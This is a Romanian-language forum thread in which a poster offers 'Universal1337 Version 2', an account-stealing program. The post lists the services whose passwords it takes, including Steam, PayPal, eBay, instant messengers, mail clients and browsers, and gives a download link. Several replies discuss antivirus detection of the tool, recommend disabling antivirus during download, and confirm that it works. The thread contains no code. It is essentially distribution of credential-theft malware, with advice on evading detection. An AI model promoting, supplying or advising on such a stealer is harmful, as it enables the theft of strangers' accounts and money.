Jump to content
neox

Universal1337 Version 2 - The Account Stealer

Recommended Posts

salut

tutorial video cum umbli cu pwstealer is video ori lucrezi cu ftp sau cu e-mail

Universal1337 Version 2 - The Account Stealer---------ce furä acest program

Steam

Produkt Keys

Network Passes

Paypal

Ebay

AIM

ICQ

Miranda

Trillian

MSN Messenger

AOL Instant Messenger

Windows Messenger (In Windows XP und Vista)

Windows Live Messenger (In Windows XP und Vista)

Yahoo Messenger

Google Talk

GAIM (Pidgin)

Windows Mail

Outlook Express

Microsoft Outlook

IncrediMail

Eudora

Netscape

Mozilla Firefox

Internet Explorer

Group Mail Free

PC Infos

http://rapidshare.com/files/96165391/asdsdf.rar

ps. daca servul il cunoaste ca virus sau trojan actualizeza din cind in cind programul

Link to comment
Share on other sites

Mie deja mi-l detecteaza ca virus.Ce sa mai actualizez ? AV nu-l opresc. :D

nu am testat inca. In general programele de spart ceva sunt considerate malefice. Vezi ce iti detecteaza: virus/troian/worm sau malware, te prinzi daca e virusat sau e doar considerat periculos si ilegal. Exemplu: Subseven toate versiunile erau imediat detectate. Ca e troian. La fel programu ala care te sterge din lista de mess a altuia.

LAST EDIT: mdah se pare ca nod32 zice la unul din fisiere ca e probably unknown NewHeur_PE virus. Nu stiu ce sa zic, pare doar o scanare heuristica si a gasit mecanisme folosite de virusi. As miza un 80% fisier curat. Poti dezactiva antivirul in timpul downloadului si apoi nu mai ai treaba, dezarhivezi doar ce pare curat.

Voi ce ziceti, e sau nu virus? care incearca primul?

Apropo: ce bine ca a scos rapidshare captcha, m-a innebunit de 2 zile sa bat 8 litere intr-un camp de 4 ca sa zica "nu-i bine"

Link to comment
Share on other sites

MAI EU L-AM incercat merge...clientul il gaseste ca virus dar serverul nu-l gasea inainte akm il gaseste deci cum il actualizez????? :?: :?: :?:

pai n-ai ce actualiza. Nu e keylogger de bagat la victima in comp sper. Orice threat e gasit ca malefic cum am zis mai sus pentru a contracara asemenea activitati. Insa antivirusul nu e sigur inca. Mai asteptam pana o sa zica ca e un "program malefic", ceva, si atunci inseamna ca fisierul e curat (nu e nimic altceva intr-insul).

Link to comment
Share on other sites

Apropo: ce bine ca a scos rapidshare captcha, m-a innebunit de 2 zile sa bat 8 litere intr-un camp de 4 ca sa zica "nu-i bine"

norocosule....eu am venit mai tarziu si guess what...captcha up again:(

cine face un upload pe...megaupload sau unde preferati voi?

LOOOOOL kkm-ash pe chaptca lor, acu tre sa caut matze???? :shock: Bine macar ca au hint "4 leters with a ‰" matza naibii. C^TSSSSS!!!! :X

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...